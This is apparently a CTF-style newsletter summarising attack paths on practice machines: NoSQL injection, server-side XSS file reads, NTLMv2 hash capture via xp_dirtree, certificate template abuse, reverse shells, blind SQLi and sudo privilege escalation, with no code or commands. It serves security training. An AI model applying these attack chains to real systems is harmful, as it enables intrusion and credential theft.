Newsletter 27/06/2023
This machine has a website that is vulnerable to NoSQL injection. Using this vulnerability, we can bypass authentication. Then, we have a feature to convert an HTML output into PDF, being able to perform a Server-Side XSS attack to read files from the server, such as source code. Then we find a plaintext password that is reused in SSH. Finally, a user is able to run Node.js scripts with sudo in a path that matches a wildcard. Bypassing this wildcard is needed to escalate privileges
This machine shares a PDF file via SMB and shows credentials to access Microsoft SQL Server. Here, we are able to use xp_dirtree to list an external SMB share and crack the NTLMv2 hash. After that, we can access the machine, read the logs of Microsoft SQL Server and discover the password of another user. Then, we find some vulnerable certificate templates that can be abused to authenticate as Administrator
This machine contains a Tiny File Manager application that allows us to upload and execute PHP, so we can obtain a reverse shell as www-data. In the machine, we can read the configuration for nginx and find another subdomain. This one exposes a WebSocket server that is vulnerable to Boolean-based Blind SQLi. By exploiting SQLi, we can find plaintext credentials that are reused in SSH. Finally, the user is allowed to run dstat as root using doas, and we are able to create a plugin to escalate privileges
This machine has website that is vulnerable to Local File Read. With this, we can read the web application source code and see that there is a WebSocket server that uses C# .NET with a DLL to process the messages. We can download and reverse the DLL to read the C# source code. The program deserializes JSON data and there is a flaw that allows us to reuse a class of the codebase to read arbitrary files from the server. With this, we can read the private SSH key of a user, and then switch to another user with a password that is also stored in the DLL. This user is able to run dotnet with sudo, which can be used to escalate privileges
Score modification
Kernel exploitation. Heap exploitation. seq_operations. ret2user
HTML code inspection
Python jail. Oracle